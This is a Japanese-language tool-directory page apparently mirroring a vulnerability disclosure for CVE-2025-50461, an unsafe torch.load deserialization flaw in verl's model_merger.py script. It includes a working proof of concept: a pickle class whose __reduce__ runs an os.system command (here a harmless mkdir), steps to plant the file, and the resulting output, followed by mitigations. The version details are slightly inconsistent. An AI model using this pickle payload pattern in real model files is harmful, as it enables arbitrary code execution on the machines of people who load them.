Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50461 — Technical Details and Exploit for CVE-2025-50461 | Kitploit
ツール/GitHubGitHub/anchor0221/cve-2025-50461
Payload GenerationVulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technical Details and Exploit for CVE-2025-50461

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-50461: Verl における安全でないモデルデシリアライゼーションを通じたリモートコード実行

ステータス: 予約済み
このCVE IDは割り当てられていますが、公式のCVEリストにはまだ公開されていません。

Volcengineのverl 3.0.0には、特に "fsdp" バックエンドを使用する際の scripts/model_merger.py スクリプトにデシリアライゼーションの脆弱性が存在します。このスクリプトは、ユーザーが提供した .pt ファイルに対して weights_only=False で torch.load() を呼び出し、悪意を持って作成されたモデルファイルが読み込まれた場合に、攻撃者が任意のコードを実行できるようにします。攻撃者は、被害者に悪意のあるモデルファイルをダウンロードさせ、特定のファイル名パターンでローカルディレクトリに配置させることで、この脆弱性を悪用する可能性があります。この脆弱性は、スクリプトを実行するユーザーの権限で任意のコードが実行される可能性があります。

説明

影響を受けるリポジトリ

  • プロジェクト: volcengine/verl
  • 影響を受けるバージョン: <= v0.4.0
  • ファイル: scripts/model_merger.py
  • GitHub パーマリンク: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • 依存関係: PyTorch < 2.6.0

概念実証 (PoC)

ステップ 1: 悪意のあるモデルファイル (malicious.pt) を作成する

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

ステップ 2: 名前を変更して配置する

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

ステップ 3: 脆弱なスクリプトを実行する

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

結果

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

コマンド mkdir HACKED! が被害者のシステム上で実行されます。

緩和策

  • アップグレード: PyTorch 2.6.0以降にアップグレードしてください。デフォルトで weights_only=True となり、デシリアライゼーションのリスクが軽減されます。
  • コードの修正: torch.load を呼び出す際に明示的に weights_only=True を設定する。
  • 検証の実装: 読み込み前にモデルファイルの整合性を確認する。
  • ユーザーへの教育: 信頼できないソースからモデルを読み込まないように注意喚起する。

より安全な読み込みの例:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

CVE ステータス

著者

  • 発見者: Yu Rong (戎誉) および Hao Fan (凡浩)
  • 連絡先: [[email protected]]
ツールをダウンロード
フィールド値
CVE IDCVE-2025-50461
CVSS スコアTBD
CWECWE-502: Deserialization of Untrusted Data
報告日2025-04-30
公開日2025-08-15
影響を受けるバージョン<= v0.4.0
修正バージョン